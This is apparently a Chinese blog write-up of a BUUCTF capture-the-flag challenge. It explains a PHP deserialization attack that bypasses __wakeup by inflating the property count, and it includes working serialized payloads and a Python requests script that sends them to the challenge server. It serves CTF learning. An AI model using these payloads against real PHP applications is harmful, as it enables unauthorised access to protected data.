BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量421 收藏 2
点赞数 1
分类专栏: 反序列化/序列化 Classical CTF-WEB 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/119135734
版权

BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化

在这里插入图片描述
提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。
首先是flag.php,这里面虽然有flag。但是这个flag是假的。

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

然后就是index.php,你打开它后会发现它是WEB界面的那个代码。
最后,想要拿到真正的flag。需要从class.php下手

<?php
include 'flag.php';
error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();       
        }
    }
}
?>

刚开始看到这份代码的时候,以为就只是个简单的反序列化题。所以设置payload:

O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}

结果没过多久就被打脸了。发现到还有些知识点我还没学过。
首先是wakeup()函数: 与__sleep()函数相反,__sleep()函数,是在序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。这个__wakeup()函数有个漏洞就是当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。

然后是PHP的private(私有类)的反序列化: 可以参考PHP——serialize()序列化类变量public、protected、private的区别

最后,总结上面的知识,更改后的payload为:

O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}

但是这个payload不可以直接在URL上提交,但是可以通过Python来提交得到flag

import  requests

url ="http://60e43bd9-9892-464c-8bc9-57d246f55b67.node4.buuoj.cn/"
html = requests.get(url+'?select=O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}')
print(html.text)

在这里插入图片描述

根据那些大佬说的,如果这个payload是在URL上提交的话。会因为编码问题,在传递\00的时候会丢失。所以这里需要把\00改成%00。所以最后得到的payload为:

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述

若丶时光破灭
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 380
反序列化漏洞。
极客标记:极客标记-极客标记系统
02-03
极客标记-极客标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
BUUCTF--[极客挑战 2019]PHP
qq_46263951的博客
09-04 273
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 421
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF】[极客挑战 2019]PHP
aoao331198的博客
04-06 926
打开网站提示说有备份文件 dirsearch扫描 下载www.zip查看 重要文件class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&
BUUCTF [极客挑战 2019] PHP
Senimo
07-30 982
BUUCTF [极客挑战 2019] PHP Web writeup 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源码,打开其中的flag.php,得到flag: ...
yanglr.github.io:极客玩家大白 - Github pages
07-23
极客玩家大白 的个人博客 托管在 Github pages,部署在 zeit.co (或称 now.sh,现) 原地址: 或 . 这是我的个人博客项目,里面会记录技术、运营和生活的点点滴滴。 访问地址: 或 大白技术控的技术博客,兼谈运营硬核...
分享关于GPT-4的产品化狂想
03-26
但我们对他如何产品化还知之甚少,能看见的应用方案,主要还是以API的形式完成,更多属于极客和开发者。 那么,这轮AI热潮下,到底有可能产生哪些“杀手级”产品呢?我们以GPT-4的一些关键特性作为线索,来和大家...
微信小程序-极客学院.zip
04-14
微信小程序-极客学院.zip,小程序模板代码,基于微信小程序的在线免费小说的开发。,可以直接从源码里粘贴复制过来,虽然这样做不利于自己独立编写代码。
微信小程序实验源码-极客学院 v1.0
12-02
微信小程序实验源码-极客学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,特色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片...
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 5163
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
Web方向】 3-1 PHP反序列化buuCTF实例UnserializeOne wp
wanderer的博客
11-16 447
BUUCTF PHP反序列化UnserializeOne wp,过程有点绕脑……
BUUCTFphp反序列化
yzl_007的博客
10-23 938
BUUCTFphp反序列化 [极客挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
(wp)ctfweb-buu中php反序列化
qq_51862722的博客
07-12 832
(wp)ctfweb-buu中php反序列化 我的blog,欢迎来玩 前面整理过php反序列化的知识点。 1.[极客挑战 2019]PHP 进入页面,根据提示,考虑备份导致源码泄露。 于是用扫描工具(ctfwscan)进行目录扫描,发现备份文件可以成功访问,如图 然后下载下来,打开,有五个文件: 尝试flag.php后不对,审计class.php和index.php,找到了可反序列化点 因为包含了class.php文件,所以审计class.php class中没有调用类,根据index中代码,.
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1504
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
【CTF】buuctf web(三)——PHP序列化反序列化
m0_52923241的博客
08-04 1713
[极客挑战 2019]PHP 题目类型:序列化反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
极客挑战php,BUUCTF-[极客挑战 2019]PHP 1
weixin_33423874的博客
03-22 340
打开题目,我们就看到这个猫,先是用鼠标晃了晃,还跟着我的光标摇脑袋。我是来做题的。前端工程师肯定也对这个下功夫了。有一个良好的备份网站的习惯很好啊,我们首先根据题目的提示,用dirsearch扫目录如果没有这个工具的可以去github上下载就可以了。最终,我们扫到这个备份文件www.zip这个备份文件于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,解压之后,我们看到了这些打开f...
php反序列化-BUUCTF刷题记录
cike_y
11-30 777
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值